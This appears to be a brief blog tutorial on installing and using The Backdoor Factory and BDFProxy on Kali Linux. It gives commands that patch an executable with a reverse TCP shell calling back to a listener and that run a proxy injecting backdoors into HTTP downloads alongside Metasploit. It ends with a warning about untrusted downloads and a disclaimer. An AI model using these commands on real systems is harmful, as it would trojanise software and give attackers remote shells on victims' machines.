The tool suite is namely The Backdoor Factory and it also comes with a proxy to inject the backdoor while the victim is downloading the binaries - BDFProxy. The BDFProxy is working for HTTP protocol only.
Joshua Pitts discovers that one of the Tor Network Exit Nodes doing code injection to the binaries which are downloaded by victims via Tor network. His blog is showing how it will be and the interview report is talking about that.
How to install BDFactory on Kali Linux 1.0.9a?
BDFactory is working very well with Metasploit Framework.
apt-get update
apt-get dist-upgrade
apt-get autoclean
apt-get --purge autoremove
apt-get install python-pipInstall BDFactory :
cd ~
git clone https://github.com/secretsquirrel/the-backdoor-factory.git
cd the-backdoor-factory
./install.shTo update :
./update.shInstall BDFProxy :
cd ~
git clone https://github.com/secretsquirrel/BDFProxy.git
cd BDFProxy
./install.shTo update :
./update.shUsage of BDFactory :
./backdoor.py -f psexec.exe -H 192.168.0.100 -P 8080 -s reverse_shell_tcpUsage of BDFProxy :
nano bdfproxy.cfg*change the settings when necessary
./bdf_proxy.pymsfconsole -r bdfproxy_msf_resource.rc*if you are working with Pineapple, you need run ./wpBDF.sh to configure your environment
Conclusion
Don't trust your downloaded binary even it is downloaded from the trusted source when it is delievered via HTTP. Meanwhile, please download binaries in Tor network with care.
Please DO NOT use this tool suite for illegal purpose; otherwise, you will be put into the jail.
REFERENCE
Evasion of Anti-Virus with Veil Framework and The Backdoor Factory
Transparently proxify virtual machines Transparent Proxy (Linux)
Framework for Man-In-The-Middle Attack
HOWTO : Protect You From Being ARP Spoofing
That's all! See you.
